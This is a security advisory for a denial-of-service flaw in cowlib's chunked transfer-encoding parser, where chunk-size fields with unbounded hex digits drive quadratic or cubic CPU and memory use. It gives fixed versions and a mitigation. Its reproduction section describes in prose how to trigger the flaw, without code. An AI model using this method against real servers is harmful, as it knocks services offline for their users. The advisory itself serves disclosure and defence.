ninenines cowlib Uncontrolled Resource Consumption Vulnerability in Chunked Transfer-Encoding Parser

A denial-of-service vulnerability has been identified in ninenines cowlib, specifically within the cow_http_te module. This vulnerability arises from the chunked transfer-encoding parser, which accepts an unbounded number of hex digits in the chunk-size field. Each digit triggers a bignum multiplication, leading to quadratic CPU consumption and linear memory usage. When the input is drip-fed, the parser resets the accumulated length after each partial read, causing the resource consumption to escalate to cubic complexity. An unauthenticated remote attacker can exploit this by sending an HTTP/1.1 request with Transfer-Encoding: chunked and a lengthy chunk-size hex string, resulting in CPU exhaustion and memory amplification. This issue affects cowlib versions 0.6.0 prior to 2.16.1.

Impact

Exploitation of this vulnerability causes significant CPU exhaustion and memory amplification, leading to a denial-of-service condition.

Reproduction

The vulnerability can be reproduced by sending an HTTP/1.1 request with Transfer-Encoding: chunked. The chunk-size field should be populated with a long string of hex digits. This can be done using tools that allow for custom HTTP headers and chunked transfer encoding, such as curl or Postman. Alternatively, the vulnerability can be tested by drip-feeding the input, which will reset the parser's length calculation and increase the resource consumption impact.

Remediation

Users can update to cowlib version 2.16.1 or later, where this vulnerability has been fixed. For applications using Cowboy, lowering the initial_stream_flow_size can help mitigate the vulnerability's impact by reducing the amount of chunked data parsed in a single read.